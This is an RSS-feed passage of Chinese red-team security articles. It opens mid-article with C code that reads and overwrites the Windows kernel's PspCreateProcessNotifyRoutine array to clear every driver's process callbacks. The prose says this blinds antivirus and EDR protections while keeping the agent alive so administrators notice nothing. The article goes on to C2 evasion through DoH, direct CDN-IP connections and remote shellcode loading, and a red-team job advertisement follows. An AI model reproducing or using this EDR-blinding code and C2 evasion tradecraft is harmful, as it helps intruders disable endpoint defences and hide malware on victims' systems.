DriverReadMemery((VOID*)(PspSetCallbackssNotifyRoutineAddress + i), buffer, <span class="code-snippet__number">1</span>);</span></code><code><span class="code-snippet_outer">    PspOffset = ((UINT64)*buffer &lt;&lt; k) + PspOffset;</span></code><code><span class="code-snippet_outer">  }</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">  <span class="code-snippet__keyword">if</span> ((PspOffset &amp; <span class="code-snippet__number">0x00000000ff000000</span>) == <span class="code-snippet__number">0x00000000ff000000</span>)</span></code><code><span class="code-snippet_outer">    PspOffset = PspOffset | <span class="code-snippet__number">0xffffffff00000000</span>; </span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">  INT64 PspCreateProcessNotifyRoutineAddress = PspSetCallbackssNotifyRoutineAddress + PspOffset + <span class="code-snippet__number">7</span>;</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">  <span class="code-snippet__keyword">return</span> PspCreateProcessNotifyRoutineAddress;</span></code><code><span class="code-snippet_outer">}</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__function"><span class="code-snippet__keyword">int</span> <span class="code-snippet__title">main</span><span class="code-snippet__params">()</span></span></span></code><code><span class="code-snippet_outer">{  </span></code><code><span class="code-snippet_outer">  Process = InitialDriver();</span></code><code><span class="code-snippet_outer">  <span class="code-snippet__keyword">if</span> (!Process) <span class="code-snippet__keyword">return</span> <span class="code-snippet__number">0</span>;</span></code><code><span class="code-snippet_outer">  INT64 PspCreateProcessNotifyRoutineAddress = GetPspCreateProcessNotifyRoutineArray();</span></code><code><span class="code-snippet_outer">  <span class="code-snippet__keyword">if</span> (!PspCreateProcessNotifyRoutineAddress) {</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__built_in">printf</span>(<span class="code-snippet__string">&#34;Exit1\n&#34;</span>);</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">return</span> <span class="code-snippet__number">0</span>;</span></code><code><span class="code-snippet_outer">  }</span></code><code><span class="code-snippet_outer">  <span class="code-snippet__built_in">printf</span>(<span class="code-snippet__string">&#34;PspCreateProcessNotifyRoutineAddress: %I64x\n&#34;</span>, PspCreateProcessNotifyRoutineAddress);</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">  INT64 buffer = <span class="code-snippet__number">0</span>;</span></code><code><span class="code-snippet_outer">  <span class="code-snippet__comment">//展示所有注册进程回调的驱动</span></span></code><code><span class="code-snippet_outer">  <span class="code-snippet__built_in">printf</span>(<span class="code-snippet__string">&#34;注册了进程回调的驱动基地址及其名称: \n----------------------------------------------------\n&#34;</span>);</span></code><code><span class="code-snippet_outer">  <span class="code-snippet__keyword">for</span> (<span class="code-snippet__keyword">int</span> k = <span class="code-snippet__number">0</span>; k &lt; <span class="code-snippet__number">64</span>; k++)</span></code><code><span class="code-snippet_outer">  {</span></code><code><span class="code-snippet_outer">    DriverReadMemery((VOID*)(PspCreateProcessNotifyRoutineAddress +(k * <span class="code-snippet__number">8</span>)), &amp;buffer, <span class="code-snippet__number">8</span>);</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">if</span> (buffer == <span class="code-snippet__number">0</span>) <span class="code-snippet__keyword">continue</span>;</span></code><code><span class="code-snippet_outer">    INT64 tmpaddr = ((INT64)buffer &gt;&gt; <span class="code-snippet__number">4</span>) &lt;&lt; <span class="code-snippet__number">4</span>;</span></code><code><span class="code-snippet_outer">    DriverReadMemery((VOID*)(tmpaddr + <span class="code-snippet__number">8</span>), &amp;buffer, <span class="code-snippet__number">8</span>);</span></code><code><span class="code-snippet_outer">    INT64 DriverCallBackFuncAddr = (INT64)buffer;</span></code><code><span class="code-snippet_outer">    DisplayDriverName(DriverCallBackFuncAddr);</span></code><code><span class="code-snippet_outer">  }</span></code><code><span class="code-snippet_outer">  <span class="code-snippet__built_in">printf</span>(<span class="code-snippet__string">&#34;----------------------------------------------------\n以上不保证完全准确\n&#34;</span>);</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">  <span class="code-snippet__comment">//清除全部驱动的进程回调</span></span></code><code><span class="code-snippet_outer">  BYTE* data = (BYTE*)<span class="code-snippet__built_in">calloc</span>(<span class="code-snippet__number">1</span>, <span class="code-snippet__number">1</span>);</span></code><code><span class="code-snippet_outer">  <span class="code-snippet__keyword">for</span> (<span class="code-snippet__keyword">int</span> i = <span class="code-snippet__number">0</span>; i &lt; <span class="code-snippet__number">64</span>; i++)</span></code><code><span class="code-snippet_outer">  {</span></code><code><span class="code-snippet_outer">    DriverReadMemery(data, (VOID*)(PspCreateProcessNotifyRoutineAddress + (i * <span class="code-snippet__number">8</span>)), <span class="code-snippet__number">8</span>);</span></code><code><span class="code-snippet_outer">  }</span></code><code><span class="code-snippet_outer">  <span class="code-snippet__built_in">printf</span>(<span class="code-snippet__string">&#34;[Success] 进程回调清除完成\n&#34;</span>);</span></code><code><span class="code-snippet_outer">  system(<span class="code-snippet__string">&#34;pause&#34;</span>);</span></code><code><span class="code-snippet_outer">}</span></code></pre></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style=""></span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">1. 首先获取ntoskrnl.exe基地址</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">2. 然后定位PspSetCreateProcessNotifyRoutine函数地址</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">3. 其次获取Pspsetcreateprocessnotifyroutine 函数的偏移地址</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">4. 再后获取PspCreateProcessNotifyRoutineArray 数组地址</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">5. 后面，定位所有注册进程回调的驱动</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">6. 最后，利用DriverReadMemery()，清除全部/部分驱动的进程回调</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><br/></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">最终实现了终端应用的致盲，例如这个案例是大数字开了核晶，主进程仍然在，但他一些防护功能（文件防护、进程防护、安全防护、网络安全防护、对外攻击拦截）都已经灰色了，功能失效了。这样还能有效的避免因为主进程被杀死，跟总控端的通讯异常进而导致管理员的疑心。</span></section><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.5518518518518518" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=302bceb5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtKIkBwILjibaSbnlB54lsaCzEAAeFukJ0x5Nic9ydoXmEqgpc3JuNau07BZw6rHOtWSgYBWvrkQicGjQ%2F640%3Fwx_fmt%3Dpng"/></p><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;">更多致盲手法可以关注 myzxcg@深蓝攻防实验室 的 <a target="_blank" href="https://mp.weixin.qq.com/s?__biz=MzkyNDUzMDEyNw==&amp;mid=2247484322&amp;idx=1&amp;sn=7adc6bf32a16c0225b4c9b2148ec556d&amp;scene=21#wechat_redirect" textvalue="白驱动 Kill AV/EDR" linktype="text" imgurl="" imgdata="null" tab="innerlink" data-linktype="2">白驱动 Kill AV/EDR</a><span style=""></span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style=""><br/></span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style=""><br/></span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><strong><span style="">流量侧的逃逸手段</span></strong></section><section style="text-align: center;line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.4740740740740741" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=1406f04a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtKIkBwILjibaSbnlB54lsaCzOKetHCU4iakbqHTA6GKodvtPkic4GOGeUNkicicucjXKBeAQBViawppVia1Q%2F640%3Fwx_fmt%3Dpng"/></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style=""></span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">常见的一些检测手段包括域名情报、恶意外联、心跳特征等（类似像cs 这种c2都有心跳特征）、还有一些协议特征；</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><br/></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">其实我们得主要目的是这两个（<span style="color: rgb(255, 0, 0);">看不懂、拦不住</span>）：</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">一个是在流量侧不好发现恶意流量（https看不懂），类似DOH主要是完成的这部分。加密流量，当然加密流量也能解，可能需要平衡误报率；毕竟Doh是一个正常的技术应用。（<span style="letter-spacing: 0.578px;text-wrap: wrap;">没有伪装什么，都是正常的DNS流量</span>）</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style=""><br/></span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">另一个是即使发现了是恶意流量，也（短期）阻止不了。例如cdn IP直连就是这个应用，我的木马跟CDN IP 直连，CDN利用域名跟我们的C2连接。即使捕获了域名封禁也没意义；因为木马不是跟域名直接通信；IP池可以最高支持1000个，并且是在内存中加密保存，分析人员短时间内无法全部分析出。极大增加了分析时间成本。</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style=""><br/></span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">接下来我们重点看一下Doh方案</span></section><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.4685185185185185" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=b6b8a9f2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtKIkBwILjibaSbnlB54lsaCzf34DCUPIBaNl7Rgvm3tibcSwib8wibM0ZygJFjRWj9dHLsYvIMr27wXjQ%2F640%3Fwx_fmt%3Dpng"/></p><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style=""></span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: var(--articleFontsize);letter-spacing: 0.034em;">顾名思义是domain over http; 还有DOT等 over TLS等</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">技术不新，但落地比较晚。Windows和macOS也是只在最新的系统版本里刚刚支持，而腾讯DNSPod也是2022年才开放了DoH/DoT的公测。</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">DoT 在专用端口上通过 TLS 连接 DNS 服务器，而 DoH 是基于使用 HTTPS 应用层协议，将查询发送到 HTTPS 端口上的特定 HTTP 端点，这里造成的外界感知就是端口号的不同，DoT 的端口号是 853，DoH 端口号 443。</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style=""><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.3453703703703704" data-s="300,640" style="letter-spacing: 0.578px;text-align: center;text-wrap: wrap;" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=9c9fed67&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtKIkBwILjibaSbnlB54lsaCzWTVBPFUe2ibNNzwjiaRiafxKLRM0TUGZIcJZuK5pI7jzHribPJOlUpZqcQ%2F640%3Fwx_fmt%3Dpng"/></span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style=""><br/></span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><strong><span style="">主要应用场景：</span></strong><span style=""></span></section><ol class="list-paddingleft-1" style="list-style-type: decimal;"><li><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">域名请求过程中，保护CDN的域名。</span></section></li><li><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">防域名劫持，强行过墙。</span></section></li><li><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">使用libcurl库顺便实现HTTPS远程加载shellcode，且无JA3指纹特征。</span></section></li><li><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">使用libcurl库的证书链校验/host校验功能，防止中间人攻击解密HTTPS流量。</span></section></li></ol><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: var(--articleFontsize);letter-spacing: 0.034em;"></span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: var(--articleFontsize);letter-spacing: 0.034em;">更多</span><a target="_blank" href="http://mp.weixin.qq.com/s?__biz=MzU0NTI4MDQwMQ==&amp;mid=2247484040&amp;idx=1&amp;sn=424879af2c898b1de8d899b7ab4d5f11&amp;chksm=fb6e1a76cc199360ca57fe461d773af9e30d2f6aa8a9db9dea18befa2bf839054ce38dcbb070&amp;scene=21#wechat_redirect" textvalue="Doh" linktype="text" imgurl="" imgdata="null" data-itemshowtype="0" tab="innerlink" data-linktype="2" style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: var(--articleFontsize);letter-spacing: 0.034em;">Doh</a><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: var(--articleFontsize);letter-spacing: 0.034em;">相关应用可以参考公众号上篇文章。</span><br/></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style=""><br/></span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><br/></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><strong><span style="">议题回顾</span></strong></section><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.6990740740740741" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=c52bb0f5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtKIkBwILjibaSbnlB54lsaCzKicnIBsjcn0dG7GsZnkckzws5Gk4tTRRwxkOP9fZvaCLYS3Iueib7qcw%2F640%3Fwx_fmt%3Dpng"/></p><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><br/></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><section style="display: none;line-height: 1.5em;"><br/></section></section><section style="margin-top: 0px;margin-bottom: 0px;"><section style="display: none;line-height: 1.6em;"><br/></section></section><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247484077">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=3c0d45a5&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU0NTI4MDQwMQ%3D%3D%26mid%3D2247484077%26idx%3D1%26sn%3D2d30b447ae75016248050f5034ceb0da%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Sat, 04 Nov 2023 17:25:00 +0800</pubDate>
    </item>
    <item>
      <title>深蓝攻防实验室攻防研究员招聘(长期)</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU0NTI4MDQwMQ==&amp;mid=2247484045&amp;idx=1&amp;sn=d808757bec1376d8e8bf94e562d9ac22</link>
      <description>深蓝攻防实验室攻防专家/安全攻防研究员长期招聘</description>
      <content:encoded><![CDATA[<p>
<span>sm0nk</span> <span>2023-07-25 23:25</span> <span style="display: inline-block;">北京</span>
</p>

<p>深蓝攻防实验室攻防专家/安全攻防研究员长期招聘</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=0ce9094a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FgS0DP6tuCtIps0FIOvqBwDiclB8CiaqQsCc0HgiaFmpU1eKDlhsHaGiaIdcoGrcWysGguYouH5oIDD8ibcMsSW8eNyw%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<section style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-kerning: auto;font-optical-sizing: auto;font-feature-settings: normal;font-variation-settings: normal;font-stretch: normal;font-size: 20px;font-family: &#34;Helvetica Neue&#34;;color: rgb(0, 0, 0);letter-spacing: normal;text-wrap: wrap;margin-bottom: 8px;margin-top: 8px;line-height: 2em;"><span style="font-size: 16px;"><strong>安全</strong><strong>攻防研究员/攻防专家</strong>，坐标北京（牡丹园）<br/></span></section><section style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-kerning: auto;font-optical-sizing: auto;font-feature-settings: normal;font-variation-settings: normal;font-stretch: normal;font-size: 20px;font-family: &#34;Helvetica Neue&#34;;color: rgb(0, 0, 0);letter-spacing: normal;text-wrap: wrap;margin-bottom: 8px;margin-top: 8px;line-height: 2em;"><span style="font-size: 16px;"><span style="font-family: &#34;Helvetica Neue&#34;;letter-spacing: normal;text-wrap: wrap;color: rgb(255, 0, 0);"><strong><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-kerning: auto;font-optical-sizing: auto;font-feature-settings: normal;font-variation-settings: normal;font-stretch: normal;font-family: &#34;PingFang SC&#34;;">北京、上海、深圳</span></strong></span><span style="color: rgb(0, 0, 0);font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;letter-spacing: normal;text-wrap: wrap;font-kerning: auto;font-optical-sizing: auto;font-feature-settings: normal;font-variation-settings: normal;font-stretch: normal;font-family: &#34;PingFang SC&#34;;"> 的攻防岗位，目前有HC ，欢迎咨询。</span></span></section><section style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-kerning: auto;font-optical-sizing: auto;font-feature-settings: normal;font-variation-settings: normal;font-stretch: normal;font-size: 13px;font-family: &#34;Helvetica Neue&#34;;color: rgb(0, 0, 0);letter-spacing: normal;text-wrap: wrap;margin-bottom: 8px;margin-top: 8px;line-height: 2em;"><br/></section><section style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-kerning: auto;font-optical-sizing: auto;font-feature-settings: normal;font-variation-settings: normal;font-stretch: normal;font-size: 13px;font-family: &#34;Helvetica Neue&#34;;color: rgb(0, 0, 0);letter-spacing: normal;text-wrap: wrap;margin-bottom: 8px;margin-top: 8px;line-height: 2em;"><span style="font-size: 16px;"><strong>岗位职责：</strong></span></section><section style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-kerning: auto;font-optical-sizing: auto;font-feature-settings: normal;font-variation-settings: normal;font-stretch: normal;font-size: 13px;font-family: &#34;Helvetica Neue&#34;;color: rgb(0, 0, 0);letter-spacing: normal;text-wrap: wrap;margin-bottom: 8px;margin-top: 8px;line-height: 2em;"><span style="font-size: 16px;">1. 红队实战攻防（getshell、防御逃逸、拿权限），偏漏洞挖掘方向（<span style="color: rgb(255, 0, 0);">Java安全</span>、框架安全）</span></section><section style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-kerning: auto;font-optical-sizing: auto;font-feature-settings: normal;font-variation-settings: normal;font-stretch: normal;font-size: 13px;font-family: &#34;Helvetica Neue&#34;;color: rgb(0, 0, 0);letter-spacing: normal;text-wrap: wrap;margin-bottom: 8px;margin-top: 8px;line-height: 2em;"><span style="font-size: 16px;">2. 红队攻击链，红队专题体系研究、疑难杂症突破，方法论输出</span></section><section style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-kerning: auto;font-optical-sizing: auto;font-feature-settings: normal;font-variation-settings: normal;font-stretch: normal;font-size: 13px;font-family: &#34;Helvetica Neue&#34;;color: rgb(0, 0, 0);letter-spacing: normal;text-wrap: wrap;margin-bottom: 8px;margin-top: 8px;line-height: 2em;"><span style="font-size: 16px;">3. 研究前沿攻防技术、跟踪安全动态以及漏洞，沉淀部门的工具库、漏洞库、知识库；</span></section><section style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-kerning: auto;font-optical-sizing: auto;font-feature-settings: normal;font-variation-settings: normal;font-stretch: normal;font-size: 13px;font-family: &#34;Helvetica Neue&#34;;color: rgb(0, 0, 0);letter-spacing: normal;text-wrap: wrap;margin-bottom: 8px;margin-top: 8px;line-height: 2em;"><span style="font-size: 16px;">4. 红队相关评估工作，行业、省级、国家级攻防演练等</span></section><section style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-kerning: auto;font-optical-sizing: auto;font-feature-settings: normal;font-variation-settings: normal;font-stretch: normal;font-size: 13px;font-family: &#34;Helvetica Neue&#34;;color: rgb(0, 0, 0);letter-spacing: normal;text-wrap: wrap;margin-bottom: 8px;margin-top: 8px;line-height: 2em;"><br/></section><section style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-kerning: auto;font-optical-sizing: auto;font-feature-settings: normal;font-variation-settings: normal;font-stretch: normal;font-size: 13px;font-family: &#34;Helvetica Neue&#34;;color: rgb(0, 0, 0);letter-spacing: normal;text-wrap: wrap;margin-bottom: 8px;margin-top: 8px;line-height: 2em;"><span style="font-size: 16px;"><strong>岗位要求：</strong></span></section><section style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-kerning: auto;font-optical-sizing: auto;font-feature-settings: normal;font-variation-settings: normal;font-stretch: normal;font-size: 13px;font-family: &#34;Helvetica Neue&#34;;color: rgb(0, 0, 0);letter-spacing: normal;text-wrap: wrap;margin-bottom: 8px;margin-top: 8px;line-height: 2em;"><span style="font-size: 16px;">1. 本科，三年经验以上</span></section><section style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-kerning: auto;font-optical-sizing: auto;font-feature-settings: normal;font-variation-settings: normal;font-stretch: normal;font-size: 13px;font-family: &#34;Helvetica Neue&#34;;color: rgb(0, 0, 0);letter-spacing: normal;text-wrap: wrap;margin-bottom: 8px;margin-top: 8px;line-height: 2em;"><span style="font-size: 16px;">2. 具备大型目标攻击经验（金融行业优先），可以从防御者视角思考攻防问题，去突破限制进攻</span></section><section style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-kerning: auto;font-optical-sizing: auto;font-feature-settings: normal;font-variation-settings: normal;font-stretch: normal;font-size: 13px;font-family: &#34;Helvetica Neue&#34;;color: rgb(0, 0, 0);letter-spacing: normal;text-wrap: wrap;margin-bottom: 8px;margin-top: 8px;line-height: 2em;"><span style="font-size: 16px;">3. 对常见漏洞有深入理解，且对java安全有比较体系的能力建设</span></section><section style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-kerning: auto;font-optical-sizing: auto;font-feature-settings: normal;font-variation-settings: normal;font-stretch: normal;font-size: 13px;font-family: &#34;Helvetica Neue&#34;;color: rgb(0, 0, 0);letter-spacing: normal;text-wrap: wrap;margin-bottom: 8px;margin-top: 8px;line-height: 2em;"><span style="font-size: 16px;">4. Web渗透、社工钓鱼、内网渗透、代码审计、逆向工程，至少擅长其中两项</span></section><section style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-kerning: auto;font-optical-sizing: auto;font-feature-settings: normal;font-variation-settings: normal;font-stretch: normal;font-size: 13px;font-family: &#34;Helvetica Neue&#34;;color: rgb(0, 0, 0);letter-spacing: normal;text-wrap: wrap;margin-bottom: 8px;margin-top: 8px;line-height: 2em;"><span style="font-size: 16px;">5. 热爱攻防，自省好学自驱，主动闭环</span></section><section style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-kerning: auto;font-optical-sizing: auto;font-feature-settings: normal;font-variation-settings: normal;font-stretch: normal;font-size: 13px;font-family: &#34;Helvetica Neue&#34;;color: rgb(0, 0, 0);letter-spacing: normal;text-wrap: wrap;margin-bottom: 8px;margin-top: 8px;line-height: 2em;"><br/></section><section style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-kerning: auto;font-optical-sizing: auto;font-feature-settings: normal;font-variation-settings: normal;font-stretch: normal;font-size: 13px;font-family: &#34;Helvetica Neue&#34;;color: rgb(0, 0, 0);letter-spacing: normal;text-wrap: wrap;margin-bottom: 8px;margin-top: 8px;line-height: 2em;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-kerning: auto;font-optical-sizing: auto;font-feature-settings: normal;font-variation-settings: normal;font-stretch: normal;font-family: &#34;PingFang SC&#34;;font-size: 16px;">可联系公众号后台</span></section><section style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-kerning: auto;font-optical-sizing: auto;font-feature-settings: normal;font-variation-settings: normal;font-stretch: normal;font-size: 13px;font-family: &#34;Helvetica Neue&#34;;color: rgb(0, 0, 0);letter-spacing: normal;text-wrap: wrap;margin-bottom: 8px;margin-top: 8px;line-height: 2em;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-kerning: auto;font-optical-sizing: auto;font-feature-settings: normal;font-variation-settings: normal;font-stretch: normal;font-family: &#34;PingFang SC&#34;;font-size: 16px;">亦可投递简历到邮箱 cGFubGl5YUBzYW5nZm9yLmNvbS5jbg==</span></section><section style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-kerning: auto;font-optical-sizing: auto;font-feature-settings: normal;font-variation-settings: normal;font-stretch: normal;font-size: 13px;font-family: &#34;Helvetica Neue&#34;;color: rgb(0, 0, 0);letter-spacing: normal;text-wrap: wrap;margin-bottom: 8px;margin-top: 8px;line-height: 2em;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-kerning: auto;font-optical-sizing: auto;font-feature-settings: normal;font-variation-settings: normal;font-stretch: normal;font-family: &#34;PingFang SC&#34;;font-size: 16px;"><br/></span></section><section style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-kerning: auto;font-optical-sizing: auto;font-feature-settings: normal;font-variation-settings: normal;font-stretch: normal;font-size: 13px;font-family: &#34;Helvetica Neue&#34;;color: rgb(0, 0, 0);letter-spacing: normal;text-wrap: wrap;margin-bottom: 8px;margin-top: 8px;line-height: 2em;"><span style="font-size: 16px;"><strong><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-kerning: auto;font-optical-sizing: auto;font-feature-settings: normal;font-variation-settings: normal;font-stretch: normal;font-family: &#34;PingFang SC&#34;;">本广告，长期有效</span></strong><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-kerning: auto;font-optical-sizing: auto;font-feature-settings: normal;font-variation-settings: normal;font-stretch: normal;font-family: &#34;PingFang SC&#34;;">，欢迎自荐和推荐。</span></span></section><section style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-kerning: auto;font-optical-sizing: auto;font-feature-settings: normal;font-variation-settings: normal;font-stretch: normal;font-size: 13px;font-family: &#34;Helvetica Neue&#34;;letter-spacing: normal;text-wrap: wrap;margin-bottom: 8px;margin-top: 8px;line-height: 2em;"><span style="color: rgb(0, 0, 0);"><em><span style="font-size: 16px;color: rgb(0, 0, 0);font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-kerning: auto;font-optical-sizing: auto;font-feature-settings: normal;font-variation-settings: normal;font-stretch: normal;font-family: &#34;PingFang SC&#34;;"><span style="color:#000000;">ps：</span></span></em><em><span style="font-size: 16px;color: rgb(0, 0, 0);font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-kerning: auto;font-optical-sizing: auto;font-feature-settings: normal;font-variation-settings: normal;font-stretch: normal;font-family: &#34;PingFang SC&#34;;">在以上技术的基础上，有意愿带队当队长角色也可以推荐</span></em></span></section><section style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-kerning: auto;font-optical-sizing: auto;font-feature-settings: normal;font-variation-settings: normal;font-stretch: normal;font-size: 13px;font-family: &#34;Helvetica Neue&#34;;color: rgb(0, 0, 0);letter-spacing: normal;text-wrap: wrap;margin-bottom: 8px;margin-top: 8px;line-height: 